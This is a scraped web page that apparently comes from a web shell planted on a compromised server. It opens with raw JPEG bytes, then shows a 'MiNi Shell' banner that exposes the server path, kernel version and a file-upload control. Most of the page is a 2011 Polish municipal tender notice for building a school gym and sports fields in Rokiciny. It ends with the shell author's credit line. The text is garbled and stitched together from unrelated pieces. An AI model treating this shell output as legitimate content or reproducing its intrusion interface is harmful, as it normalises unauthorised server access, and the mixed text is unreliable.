JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110211/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110211/50945-N-2011.html

<p class="kh_header"><b>Rokiciny: Poprawa infrastruktury edukacyjnej oraz jakości nauczania w placówkach oświatowych na terenie Gminy Rokiciny</b><br>
<b>Numer ogłoszenia: 50945 - 2011; data zamieszczenia: 11.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rokiciny , ul. Tomaszowska 9, 97-221 Rokiciny, woj. łódzkie, tel. 44 7195010, faks 44 7195012.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rokiciny.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa infrastruktury edukacyjnej oraz jakości nauczania w placówkach oświatowych na terenie Gminy Rokiciny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie robót ogólnobudowlanych, instalacji c.o. i wentylacji, instalacji wod-kan, instalacji elektrycznej, robót związanych z utwardzeniem terenu i budową boisk sportowych. 
Zadanie   1. Budowa sali gimnastycznej przy Gimnazjum w Popielawach
Zadanie 2. Budowa terenu rekreacyjnego z zapleczem dydaktycznym oraz przebudowa pomieszczeń higieniczno-sanitarnych przy Szkole Podstawowej w Rokicinach.
Zadanie  3.  Renowacja płyty boiska do piłki nożnej i przebudowa ogrodzenia boiska przy Szkole Podstawowej w Rokicinach
Materiały, urządzenia oraz rozwiazania techniczne wykazane w dokumentacji technicznej mogą być zastąpione równoważnymi o nie gorszych parametrach. 
2.1 Przedmiot zamówienia w zakresie zadania nr 1 dotyczy Budowa sali gimnastycznej przy Gimnazjum w Popielawach.
Sala gimnastyczna wraz z zapleczem i łącznikiem o powierzchni zabudowy 1052,18m2
Kubatura 6650m3
Fundamenty - ławy i stopy żelbetowe beton B-20
Sciany zewnetrzne jednorodne gr 36,5cm z betonu komorkowego np. YTONG współczynnik lambda= 0,41W/mK
Ściany wewnętrzne z betonu komórkowego np. YTONG gr 24 i 11,5cm
Podłoga w sali gimnastycznej  - sportowa w systemie Multiflex, panel z drewna pełnego np.SOLID
Strop nad niższą częścią Teriva o gr 24 cm, ocieplony styropianem gr 15cm. Pokrycie dachu stanowi papa termozgrzewalna w układzie dwuwarstwowym.
Dach części wyższej o konstrukcji łukowej z drewna klejonego, izolowany wełną mineralną skalną o gr 20 cm, przeznaczoną do bezpośredniego krycia papą.w systemie dwuwarstwowym - współczynnik przewodzenia ciepła  lambda= 0,04W/mK
Okna z PCV szklone szybą zespolona 4/16/4 o współczynniku U=1,1W/m2K
Instalacja wodociągowa - przyłącze z rur PE 80 z zestawem pomiarowym w studzience wodomierzowej fi 1000mm. Hydrant p.poż naziemny szt. 1 i podziemny szt. 1.
Instalacja wewnętrzna z rur stalowych ocynkowanych. 
Instalacja p.poż dwa hydranty o sr 25mm z wężem półsztywnym 30m.
Instalacja c.w.u. przygotowywana będzie w pomieszczeniu technicznym z trzech pojemnościowych podgrzewaczy o łącznej pojemności 1300l.

Instalacja kanalizacyjna - przyłącze kanalizacyjne rury PCV kl. S fi 160, studnie rewizyjne żelbetowe fi 1000 
Instalacja c.o. zasilana z istniejącego żródła ciepła wodą o parametrach 80/60 oC, dwururowa, pompowa, pracująca w systemie zamkniętym. Przewody obiegów - rury stalowe czarne bez szwu, Pozostała część instalacji wykonana będzie z rur 3-warstwowych PE-HD/AL./PE_Xb.
W budynku przewiduje się 2 obiegi ciepła technicznego c.t. - zasilanie nagrzewnic aparatów grzewczo-wentylacyjnych oraz zasilanie nagrzewnic central wentylacyjnych.Wentylacja mechaniczna
Instalacja elektryczna - wszystkie obwody odbiorcze w sali gimnastycznej będą zasilane z rozdzielnicy RG znajdujacej się w pokoju trenera. Rozdzielnice RG zasilić kablem YKY 5x16 wyprowadzonym z rozdzielnicy głównej budynku szkoły. W kosztach wykonania wlz należy przewidzieć zakup skrzynki i przeniesienie zestawów pomiarowych na zewnętrzną ścianę budynku.
Wykonanie oświetlenia zewnętrznego terenu.
Zagospodarowanie terenu, utwardzenie ścieżek i boiska do koszykówki.

Szczegółowe dane zawiera dokumentacja techniczna stanowiąca załącznik nr 8 oraz specyfikacja techniczna wykonania i odbioru robót stanowiaca załącznik nr 9  do siwz 

2.2 Przedmiot zamówienia w zakresie zadania nr 2: Budowa terenu rekreacyjnego z zapleczem dydaktycznym oraz przebudowa pomieszczeń higieniczno-sanitarnych przy Szkole Podstawowej w Rokicinach.
1.	Wykonanie miasteczka ruchu drogowego z kostki betonowej różnokolorowej gr 6cm. Kostkę układać na podsypce cementowo-piaskowej. Podbudowę wykonać z gruzobetonu odpowiednio zagęszczonego. Znaki drogowe przyjęto jako przenośne na podstawie z ciężkiej gumy. Rury stalowe ocynkowane fi 50.
2.	Wykonanie boiska wielofunkcyjnego o wymiarach 43,00m x 28,00m o nawierzchni gumowo-poliuretanowej grubości 13mm koloru czerwonego z liniami dla poszczególnych boisk (boisko do pilki ręcznej o wymiarach 40,00m x 20,00m, boisko do pilki siatkowej                          o wymiarach18,00m x 9,00m i dwa boiska do koszykówki o wymiarach 26,00m x 14,00m każde - boiska do koszykówki i piłki siatkowej nałożono na powierzchnie boiska do piki ręcznej). Nawierzchnia ta jest wodoprzepuszczalna. Nawierzchnia wykonana metodą natryskową                 na podbudowie betonowej grubości 10 cm z betonu jamistego w klasie LB-15WO /przepuszczającego wodę/. Dolną warstwę stanowi warstwa odsączająca z piasku o gr. 10cm,  w warstwie tej należy umieścić izolację z geotkaniny. Zaprojektowano umieszczenie odpowiednich tulei do mocowania elementów wyposażenia boisk.
3.	Wykonanie boiska do tenisa ziemnego o wymiarach 40,00m x 16,00m o nawierzchni gumowo-poliuretanowej grubości 13mm koloru czerwonego i zielonego / płyta gry/                      z wymalowanymi liniami. Nawierzchnia ta jest wodoprzepuszczalna. Nawierzchnia wykonana metodą natryskową na podbudowie betonowej grubości 10 cm z betonu jamistego w klasie LB-15 WO /przepuszczającego wodę/. Dolną warstwę stanowi warstwa odsączająca z piasku             o gr. 10cm, w warstwie tej należy umieścić izolacje z geotkaniny.
4.	Wykonanie bieżni i skoczni. Bieżnia 3 torowa o długości 104,00m, szerokość toru 1,5m   - całkowita szerokość bieżni 4,5m. Nawierzchnia gumowo-poliuretanowa grubości 13mm koloru czerwonego z wymalowanymi liniami. Nawierzchnia ta jest wodoprzepuszczalna. Nawierzchnia wykonana metodą natryskową na podbudowie betonowej grubości 10cm z betonu jamistego        w klasie LB-15 WO /przepuszczającego wodę/. Dolną warstwę stanowi warstwa odsączająca     z piasku o gr. 10cm, w warstwie tej należy umieścić izolację z geotkaniny. Rozbieg skoczni zaprojektowany z bieżni. Rozbieg wyposaża się w demontowalną belkę do odbicia o wymiarach 1,22m x 0,30m, którą należy zamontować 1m od krawędzi piaskownicy oraz zaślepkę                      w nawierzchni rozbiegu i wymiarach belki. Belka i zaślepka montowana na poziomie równym        z płaszczyzną bieżni, zgodnie z zaleceniami producenta. Piaskownica wypełniona piaskiem grubość warstwy  50cm. Warstwy dolne wodoprzepuszczalne. Powierzchnia piaskownicy 30m2.
5.	Wykonanie piłkochwytów z siatki polipropylenowej gr 3,5mm o oczkach 10 x 10cm zawieszonej na słupkach stalowych 70 x 70 x 5mm malowanych proszkowo w kolorze zielonym.
6.	Wszystkie zastosowane materiały i wyroby muszą posiadac niezbędne atesty, aprobaty   i deklaracje zgodności. Zastosowany sprzęt sportowy musi posiadać aktualne certyfikaty             i dopuszczenia do stosowania ze znakiem B. Montaż nawierzchni winna wykonać firma posiadająca autoryzację producenta systemu poliuretanowego zgodnie z wydaną przez niego instrukcją.
7.	Przebudowę istniejących pomieszczeń sanitarnych (roboty rozbiórkowe, roboty murarskie, tynkarskie i malarskie, wymiana okien i drzwi, roboty wykończeniowe, biały montaż.)
8.	Wykonanie przyłącza wodociągowego, kanalizacji sanitarnej, elektrycznego
9.	Wykonanie wewnętrznych instalacji sanitarnych i elektrycznych oraz wentylacji nawiewnej i wyciągowej.
Szczegółowe dane zawiera dokumentacja techniczna stanowiąca załączniki nr 13 i 16 oraz specyfikacja techniczna wykonania i odbioru robót stanowiąca załączniki nr 15 i 18  do siwz 

2.3 Przedmiot zamówienia w zakresie zadania nr 3 Renowacja płyty boiska do piłki nożnej           i  przebudowa ogrodzenia boiska przy Szkole Podstawowej w Rokicinachi.
Istniejąca płyta boiska wymaga nastepujących zabiegów:
- roboty pomiarowe - niwelacja terenu
- wykonanie zabiegów agrotechnicznych poprzez ścięcie istniejącej murawy glebogryzarką
- ściągnięcie istniejącej warstwy ziemi urodzajnej ok. 10cm
- wykonanie drenażu z rur PCV oraz  wykonanie warstwy odsączającej z piasku
- ułożenie warstwy urodzajnej
- dodatkowe nawiezienie warstwy humusu gr. 5cm
- zasiew trawy
- niwelacja terenu - wałowanie
Wymiana ogrodzenia
Przewiduje się wymiane istniejacego ogrodzenia w następujacy sposób:
- demontaz istniejącego ogrodzenia ( elementy stalowe należy przekazać inwestorowi, elementy inne należy przyjąć do utylizacji)
- od strony drogi ul. Reymonta wymienić ogrodzenie z płyt betonowych w istniejącym śladzie   na ogrodzenie z siatki w ramach stalowych na słupach stalowych o wys. 2m
- od strony ul. Tomaszowskiej i działki nr 212/4 wymienic ogrodzenie na ogrodzenie z siatki       w ramach stalowych na słupach stalowych o wys. 4m
- od strony działki 213/2 wymienić ogrodzenie na ogrodzenie z siatki w ramach stalowych             na słupach stalowych o wys. 1,2m
 - wykonanie bramy 2,00m x 2,20m
- wykonanie furtki 1,00m x 2,00m 
- przestawienie bramek
Szczegółowe dane zawiera dokumentacja techniczna oraz specyfikacja techniczna wykonania     i odbioru robót stanowiaca załącznik nr 19  do siwz 

W cenie oferty wykonawca jest zobowiązany uwzględnić dodatkowo koszty wynikające z: 
a) organizacji zaplecza i placu budowy 
b) wytyczenia obiektów i dozóru geodezyjnego, odtworzenia na koszt własny znaków geodezyjnych w przypadku naruszenia 
c) uzyskania zgody na zajęcie pasa drogowego, wykonania projektu organizacji ruchu na czas wykonywania prac - przyłącze wodociągowe- oraz poniesienia kosztów związanych z zajęciem pasa drogowego - w Zarządzie Dróg Powiatowych w Tomaszowie Mazowieckim
d) naprawy szkód powstałych w wyniku korzystania z sąsiednich nieruchomości, 
e) segregowania, składowania, unieszkodliwiania odpadów oraz gruzu budowlanego, ich wywozu i opłat za czas ich składowania (opłaty wynikające z przepisów wykonawczych do ustawy z dnia 27.04.2001 roku o odpadach (Dz. U. z 2001 roku, Nr 62, poz.628 z późniejszymi zmianami), 
f) przeprowadzenia wszelkich wymaganych przepisami prób, sprawdzeń i odbiorów przewidywanych warunkami technicznymi wykonania odbioru robót budowlano-montażowych oraz instalacyjnych, 
g) wykonania pełnej dokumentacji powykonawczej,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.30.00.00-0, 45.32.10.00-3, 45.26.25.00-6, 45.23.32.50-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
Ustala się wadium w  wysokości: 50 000,00 zł, słownie: kwota wadium  pięćdziesiąt tysięcy  zł.

2. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: Powiatowy Bank Spółdzielczy w Tomaszowie Maz. Filia Rokiciny
94 8985 0004 0090 0905 2777 0103 z adnotacją  wadium - Poprawa infrastruktury edukacyjnej oraz jakości nauczania w placówkach oświatowych na terenie Gminy Rokiciny
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
w terminie 2011-03-10, sposób przekazania: w kasie Urzędu Gminy
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień - spełnienie warunku na podstawie oświadczenia z art. 22</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 1 budynku o powierzchni użytkowej min. 900 m2 oraz co najmniej 1 boiska sportowego o nawierzchni mineralnej.
Wykonawca wykaże wykonanie jednego obiektu budowlanego (budynku lub budowli )  z dofinansowaniem z Unii Europejskiej lub Programów Rządowych  lub środków  Narodowego bądż Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Potwierdzeniem spełnienia warunku będzie wykaz wykonanych robót budowlanych wraz z załączonymi referencjami potwierdzającymi wymagania Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnienie warunku na podstawie oświadczenia z art. 22</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca wykazał, że dysponuje:
- osobą, ktora pełnić będzie obowiązki kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej zgodnie z prawem budowlanym
- osobami, posiadajacymi uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, iinstalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych zgodnie z prawem budowlanym
- osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z prawem budowlanym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien okazać się opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
  Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zwiazanej z przedmiotem zamówienia na kwotę ubezpieczenia w wysokości co najmniej 3.500 000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga złożenia z ofertą kosztorysów ofertowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Przedłużony okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiajacy przewiduje możliwość zmiany treści umowy w następujących przypadkach:
-zmiana przepisów prawnych mających wpływ na przebieg realizacji umowy a w szczególności zmiany przepisów podatkowych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rokiciny.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rokicinach
ul. Tomaszowska 9, 97-221 Rokiciny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2011 godzina 10:00, miejsce: Urząd Gminy w Rokicinach
ul. Tomaszowska 9, 97-221 Rokiciny
pokój nr 7 sekretariat Urzędu Gminy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany z dofinansowaniem ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com